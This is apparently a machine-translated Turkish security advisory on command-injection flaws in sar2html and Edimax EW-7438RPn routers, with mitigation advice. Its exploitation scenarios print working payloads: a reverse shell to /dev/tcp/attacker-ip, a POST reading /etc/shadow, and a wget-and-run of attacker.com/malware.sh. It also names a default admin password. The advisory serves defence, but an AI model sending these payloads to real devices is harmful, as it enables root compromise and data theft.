Kritik OS (İşletim Sistemi) Komut Enjeksiyonu Güvenlik Açıkları -Edimax-

Kritik OS (Edimax) Komut Enjeksiyonu Ev Sistemleri Güvenlik Açıkları

İşletim Sistemi Komutu

Giriş 

Son zamanlarda sar2html ve Edimax EW-7438RPn Mini cihazlarını etkileyen üç kritik işletim sistemi komut enjeksiyonu güvenlik açığı açıklandı. Bu güvenlik açıkları saldırganların güvenlik açığı olan sistemlerde keyfi komutlar yürütmesine olanak tanır ve potansiyel olarak sistemin tamamen tehlikeye atılmasına yol açar. Bu makale her güvenlik açığı için ayrıntılı teknik analiz ve örnek istismar senaryoları sağlar.

1. CVE-2025-34030: plot Parametresi aracılığıyla sar2html Komut Enjeksiyonu 

Güvenlik Açığı Genel Bakışı 

  • Etkilenen Ürün : sar2html (sürüm 3.2.2 ve öncesi)
  • Saldırı Vektörü : Uzaktan, kimliği doğrulanmamış
  • CVSS Puanı : 10.0 (Kritik)
  • Savunmasız Bileşen index.phpplot parametresi

    Teknik Analiz 

    Sistem etkinliği verilerini görselleştirmek için kullanılan sar2html uygulaması, plotbetiğin parametresindeki kullanıcı girdisini düzgün bir şekilde temizlemede başarısız oluyor index.php. Uygulama, bu parametreyi uygun doğrulama veya kaçış olmadan doğrudan sistem komutlarına dahil ediyor.

    Sömürü Senaryosu 

    Adım 1: Keşif 

    Bir saldırgan, şu adreste savunmasız bir sar2html kurulumunu tespit ediyor:http://target-server/sar2html/

    Adım 2: İlk Test 

    Saldırgan basit bir komut enjeksiyon testi gönderir:

    http://target-server/sar2html/index.php?plot=;id

    Bu, idkomutu uygulamanın yürüttüğü sistem komutuna ekler.

    Adım 3: Komut Yürütme

    idUygulama , arayüzünde komutun çıktısını görüntüleyerek güvenlik açığını doğruluyor.

    Adım 4: Ters Kabuk Oluşturma

    Saldırgan, ters bir kabuk oluşturmak için daha karmaşık bir yük oluşturur:

    http://target-server/sar2html/index.php?plot=;bash+-c+'bash+-i+>%26+/dev/tcp/attacker-ip/4444+0>%261'

    Bu komut saldırganın makinesine ters bir kabuk bağlantısı oluşturur.

    Adım 5: Sömürü Sonrası

    Kabuk erişimi elde edildikten sonra saldırgan şunları yapabilir:

    1. Keşif gerçekleştir ( uname -acat /etc/passwd)
    2. Kalıcı erişim oluşturun (SSH anahtarları, cron işleri ekleyin)
    3. Ağ içerisinde yanal olarak hareket edin

      Azaltma

      • sar2html sürüm 3.2.3 veya sonraki bir sürüme yükseltin
      • Giriş doğrulamasını uygulayın ve argümanları düzgün şekilde işleyen komut yürütme API'lerini kullanın
      • Uygulamayı en az ayrıcalıkla çalıştır

        2. CVE-2025-34029: syscmd.asp aracılığıyla Edimax EW-7438RPn Komut Enjeksiyonu

        Güvenlik Açığı Genel Bakışı

        • Etkilenen Ürün : Edimax EW-7438RPn Mini (1.13 ve öncesi aygıt yazılımı)
        • Saldırı Vektörü : Uzaktan, kimliği doğrulanmış
        • CVSS Puanı : 9.4 (Kritik)
        • Güvenlik Açığı Olan Bileşen /goform/formSysCmduç nokta

          Teknik Analiz

          Cihazın web arayüzü, ' syscmd.aspe gönderilen istekleri işleyen bir sistem komut işleyicisi içerir /goform/formSysCmdsysCmdParametre, kök olarak yürütülen keyfi komutları kabul eder.

          Sömürü Senaryosu

          Adım 1: Kimlik doğrulama

          Saldırgan geçerli kimlik bilgilerini şu şekilde elde eder:

          • Varsayılan kimlik bilgileri (admin:1234)
          • Kimlik bilgisi kaba kuvvetle zorlama
          • Diğer ihlallerden kimlik bilgisi toplama

            Adım 2: Komut Enjeksiyonu

            Saldırgan, güvenlik açığı bulunan uç noktaya bir POST isteği gönderir:

            POST /goform/formSysCmd HTTP/1.1
            
            Host: target-router
            
            Content-Type: application/x-www-form-urlencoded
            
            
            
            sysCmd=cat+/etc/shadow

            Adım 3: Ayrıcalık Yükseltmesi

            Komutlar root olarak çalıştırıldığından saldırgan şunları yapabilir:

            1. Şifre karmalarını ayıkla
            2. Sistem yapılandırmasını değiştir
            3. Kalıcı arka kapılar kurun

              Adım 4: Ağ Pivotlaması

              Tehlikeye atılan yönlendirici şu amaçlarla kullanılabilir:

              • Ağ trafiğini durdurun
              • DNS sorgularını yeniden yönlendir
              • Diğer dahili sistemlere saldırın

                Azaltma

                • Ürün yazılımınızı 1.14 veya sonraki bir sürüme yükseltin
                • Yönetimsel arayüz erişimini kısıtla
                • Varsayılan kimlik bilgilerini değiştir
                • Ağ segmentasyonunu uygulayın

                  3. CVE-2025-34024: Edimax EW-7438RPn Komut Enjeksiyonu mp.asp aracılığıyla

                  Güvenlik Açığı Genel Bakışı

                  • Etkilenen Ürün : Edimax EW-7438RPn (1.13 ve öncesi aygıt yazılımı)
                  • Saldırı Vektörü : Uzaktan, kimliği doğrulanmış
                  • CVSS Puanı : 9.4 (Kritik)
                  • Güvenlik Açığı Olan Bileşen /goform/mpuç nokta

                    Teknik Analiz

                    Medya oynatıcı yapılandırma işleyicisi, mp.asp'e gönderilen istekleri işler /goform/mpcommandParametre, komut enjeksiyonuna izin veren kabuk metakarakterlerini kabul eder.

                    Sömürü Senaryosu

                    Adım 1: Kimlik doğrulama

                    CVE-2025-34029'da olduğu gibi saldırgan önce geçerli kimlik bilgilerini elde eder.

                    Adım 2: Komut Enjeksiyonu

                    Saldırgan, gömülü komutlarla bir POST isteği oluşturur:

                    POST /goform/mp HTTP/1.1
                    
                    Host: target-router
                    
                    Content-Type: application/x-www-form-urlencoded
                    
                    
                    
                    command=test;wget+http://attacker.com/malware.sh+-O+/tmp/malware.sh;sh+/tmp/malware.sh

                    Adım 3: Kötü Amaçlı Yazılımın Yürütülmesi

                    Yük:

                    1. Saldırganın sunucusundan kötü amaçlı bir betik indirir
                    2. /tmp/malware.sh'ye kaydeder
                    3. Komut dosyasını kök ayrıcalıklarıyla çalıştırır

                      Adım 4: Kalıcı Erişim

                      Kötü amaçlı yazılım şunları yapabilir:

                      • Ürün yazılımı bileşenlerini değiştirin
                      • Gizli yönetici hesapları oluşturun
                      • Paket koklayıcıları yükleyin

                        Azaltma

                        • Ürün yazılımı güncellemelerini hemen uygulayın
                        • Gerekmiyorsa uzaktan yönetimi devre dışı bırakın
                        • Şüpheli giden bağlantıları izleyin
                        • Tüm form işleyicilerinde sıkı giriş doğrulamasını uygulayın

                          Çözüm

                          Bu kritik güvenlik açıkları, web arayüzlerindeki komut enjeksiyonu kusurlarının sistemin tamamını tehlikeye atabileceğini göstermektedir. Sar2html güvenlik açığı, kimlik doğrulaması gerektirmediği için özellikle tehlikelidir. Kuruluşlar şunları yapmalıdır:

                          1. Çevrelerindeki tüm etkilenen ürünleri envanterleyin
                          2. Yamaları hemen uygulayın
                          3. İstismar girişimlerini izleyin
                          4. Ağ segmentasyonu ve en az ayrıcalıklı erişim dahil olmak üzere derinlemesine savunma stratejilerini uygulayın

                            Hemen yama uygulanamayan sistemler için, bu tür saldırı modellerini engellemek üzere özel olarak tasarlanmış kurallara sahip web uygulama güvenlik duvarları uygulamayı düşünün.


                            Yorum Gönder

                            Daha yeni Daha eski

                            İletişim Formu